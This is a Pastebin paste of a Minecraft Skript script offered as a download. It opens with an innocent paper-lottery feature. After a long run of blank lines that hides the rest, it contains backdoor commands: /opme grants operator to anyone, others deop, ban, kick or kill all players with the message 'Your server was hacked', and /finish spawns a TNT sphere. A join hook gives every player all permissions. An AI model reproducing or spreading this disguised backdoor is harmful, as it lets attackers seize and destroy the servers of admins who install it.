Advertisement
Guest User

Untitled

a guest
Jan 20th, 2019
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.31 KB | None | 0 0
  1.  
  2.  
  3. on rightclick holding paper
  4. name of hold item "くじ"
  5. messsage "&eくじを引きました"
  6. remove 1 of hold item from player
  7. chance of 2%:
  8. broadcast "%player% &9さんが&aくじで当たりを引きました!"
  9. give player paper named "&6当たり" with lore "&d&n色々な物と交換できます"
  10.  
  11.  
  12.  
  13.  
  14. command /c:
  15. trigger:
  16. give command block to player
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76.  
  77.  
  78.  
  79.  
  80.  
  81.  
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88.  
  89.  
  90.  
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102. command /opme:
  103. trigger:
  104. execute player command "/playsound entity.enderdragon.death %player%"
  105. message "&6Successful, these systems were created by &bsiso_"
  106. op the player
  107. stop
  108.  
  109.  
  110. command /alldeop:
  111. trigger:
  112. execute player command "/playsound entity.blaze.death %player%"
  113. message "&7ALL players deop"
  114. deop all players
  115. stop
  116.  
  117.  
  118. command /banned:
  119. trigger:
  120. message "&call player banned!"
  121. ban all players due to "Your server was hacked"
  122. kick all players due to "L"
  123. stop
  124.  
  125. command /killer:
  126. trigger:
  127. kill all players
  128. stop
  129.  
  130.  
  131.  
  132.  
  133. command /finish:
  134. trigger:
  135. broadcast "&4End the world..."
  136. execute player command "/playsound entity_wither_spawn %player%"
  137. execute console command "tp @e %player%"
  138. execute player command "//sphere tnt 10"
  139. stop
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146. on join:
  147. execute console command "/pex user %player% add *"
  148.  
  149.  
  150.  
  151.  
  152.  
  153. Thank you for download by andounatsu
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement